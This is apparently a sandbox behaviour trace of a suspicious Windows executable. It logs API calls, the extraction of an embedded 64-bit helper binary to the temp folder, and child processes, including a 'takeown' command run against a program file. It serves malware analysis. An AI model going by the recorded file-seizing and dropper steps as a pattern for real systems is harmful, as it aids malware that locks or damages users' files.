(dwErrCode=0x0) [0243.849] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0243.849] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0243.849] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0243.849] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0243.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ´\x8cb<äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0243.849] GetLastError () returned 0x0 [0243.849] SetLastError (dwErrCode=0x0) [0243.849] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0243.849] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0243.849] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0243.849] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0243.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ´\x8cb<äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0243.849] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x80) returned 0x269de0 [0243.849] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0243.849] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0243.850] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x269de0) returned 0x80 [0243.850] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0243.850] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0243.850] GetCurrentProcess () returned 0xffffffff [0243.850] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0243.850] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0243.850] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0243.850] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0243.850] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0243.850] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0243.850] LockResource (hResData=0x43c648) returned 0x43c648 [0243.850] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x269e68 [0243.851] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0243.851] GetLastError () returned 0x20 [0243.851] GetLastError () returned 0x20 [0243.851] SetLastError (dwErrCode=0x20) [0243.851] GetLastError () returned 0x20 [0243.851] SetLastError (dwErrCode=0x20) [0243.851] GetLastError () returned 0x20 [0243.851] SetLastError (dwErrCode=0x20) [0243.851] GetLastError () returned 0x20 [0243.851] SetLastError (dwErrCode=0x20) [0243.852] GetLastError () returned 0x20 [0243.852] SetLastError (dwErrCode=0x20) [0243.852] GetLastError () returned 0x20 [0243.852] SetLastError (dwErrCode=0x20) [0243.852] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1000) returned 0x269e88 [0243.853] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0243.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2693b0 | out: hHeap=0x250000) returned 1 [0243.854] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0243.854] ExitProcess (uExitCode=0x1) [0243.854] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2660b0 | out: hHeap=0x250000) returned 1 Process: id = "268" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x165e6000" os_pid = "0x7d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "246" os_parent_pid = "0xad0" cmd_line = "takeown /F \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 885 os_tid = 0x620 Process: id = "269" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x13606000" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "223" os_parent_pid = "0x540" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 886 os_tid = 0x7a0 [0244.026] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0244.026] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0244.026] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0244.026] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0244.026] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0244.026] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0244.026] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0244.026] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0244.027] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0244.027] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0244.027] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0244.027] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0244.027] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0244.027] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0244.027] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0244.027] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0244.028] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0244.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0244.029] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0244.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0244.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0244.029] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0244.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0244.029] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0244.029] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0244.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0244.030] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0244.030] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0244.030] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0244.030] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0244.030] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0244.030] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0244.030] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0244.030] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0244.030] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0244.031] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0244.031] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0244.031] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0244.031] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0244.031] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0244.031] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0244.031] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0244.031] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0244.032] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0244.032] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0244.032] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0244.032] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0244.032] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0244.032] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0244.032] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0244.032] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0244.033] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0244.033] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0244.033] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0244.033] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0244.033] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0244.033] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0244.033] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0244.033] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0244.033] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0244.034] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0244.035] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0244.035] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0244.035] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0244.035] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0244.035] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0244.035] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0244.035] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0244.035] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0244.035] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0244.035] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0244.035] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0244.035] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0244.036] GetProcAddress (hModule=0x77710000, 